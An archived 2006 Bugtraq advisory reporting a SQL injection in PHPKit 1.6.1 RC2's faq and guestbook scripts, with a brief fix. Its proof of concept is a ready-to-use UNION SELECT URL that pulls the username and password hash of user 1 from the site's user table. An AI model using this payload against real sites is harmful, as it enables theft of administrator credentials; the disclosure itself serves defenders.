[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061110232427.7282.qmail@securityfocus.com>
Date: 10 Nov 2006 23:24:27 -0000
From: philipp.niedziela@....de
To: bugtraq@...urityfocus.com
Subject: PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit
+--------------------------------------------------------------------
+
+ PHPKit 1.6.1 RC2
+
+ Original advisory:
+ http://www.bb-pcsecurity.de/
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPKit 1.6.1 RC2
+ Venedor ...........: http://www.phpkit.de/
+ Class .............: Remote SQL Injection
+ Risk ..............: high
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ SQL-INJECTION IN SEVERAL FILES:
+ guestbook/print.php
+ faq/faq.php
+ more (but untested!)
+
+
+--------------------------------------------------------------------
+
+ POC:
+
+--------------------------------------------------------------------
+
+ /include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%20
+ 1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20
+ FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1
+
+
+ Solution:
+ -> Install Hack_Block (search google :))
+ -> escape the variables in your SQL-Statement
+
+
+--------------------------------------------------------------------
+
+ Greets and Thanks: /str0ke
+
+-------------------------[ E O F ]----------------------------------
Powered by blists - more mailing lists